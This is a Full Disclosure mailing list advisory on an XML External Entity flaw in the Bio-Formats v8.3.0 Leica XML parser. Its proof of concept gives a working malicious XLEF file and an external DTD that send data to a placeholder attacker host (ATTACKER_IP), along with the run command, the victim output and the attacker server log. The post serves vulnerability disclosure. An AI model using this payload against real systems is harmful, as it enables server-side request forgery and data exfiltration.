Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Bioformats v8.3.0 Improper Restriction of XML External Entity Reference in Bio-Formats Leica Microsystems XML Parser

From: Ron E <ronaldjedgerson () gmail com>
Date: Mon, 29 Dec 2025 22:56:29 -0500
Bio-Formats contains an XML External Entity (XXE) vulnerability in the
Leica Microsystems metadata parsing component. The vulnerability is caused
by the use of an insecurely configured DocumentBuilderFactory when
processing Leica XML-based metadata files (e.g., XLEF). When a crafted XML
file is supplied, the parser allows external entity resolution and external
DTD loading, enabling attackers to trigger arbitrary outbound network
requests, access local system resources, or cause a denial-of-service
condition during XML parsing.

*Impact:*
An attacker who can supply a crafted Leica XML metadata file may:
* Trigger XML External Entity (XXE) injection
* Perform server-side request forgery (SSRF) via outbound HTTP requests
* Access local files where XML-safe content exists
* Cause denial of service through entity expansion or parser instability
* Exfiltrate data through blind out-of-band channels
Exploitation occurs during XML parsing and does not require authentication.

*Proof of Concept:*
Malicious XLEF File
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE xxe [
  <!ENTITY % ext SYSTEM "http://ATTACKER_IP:8000/evil.dtd";>
  %ext;
]>
<xlef>
  <Image>&exfil;</Image>
</xlef>
Attacker-Controlled External DTD (evil.dtd)
<!ENTITY exfil SYSTEM "http://ATTACKER_IP:8000/exfil?data=ubuntu";>

*Exploit Execution:*
java -cp bioformats_package.jar \
     loci.formats.tools.ImageInfo xxe_blind.xlef

*Observed Exploit Output:*
Victim Application Output
Initializing reader
XLEFReader initializing xxe_blind.xlef
http://ATTACKER_IP:8000/exfil?data=ubuntu
java.io.FileNotFoundException: http://ATTACKER_IP:8000/exfil?data=ubuntu
    at org.apache.xerces.impl.XMLEntityManager.setupCurrentEntity
    at org.apache.xerces.impl.XMLEntityManager.startEntity
    at org.apache.xerces.impl.XMLDTDScannerImpl.scanDTDInternalSubset
    at javax.xml.parsers.DocumentBuilder.parse
    at LMSXmlDocument.initFromFilepath(LMSXmlDocument.java:125)
Attacker HTTP Server Log
192.x.x.x - - [23/Dec/2025 23:28:19]
"GET /exfil?data=ubuntu HTTP/1.1" 404 -
The outbound HTTP request confirms that the XML parser resolved
attacker-controlled external entities during file parsing.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/
Previous By Date Next
Previous By Thread Next

Current thread: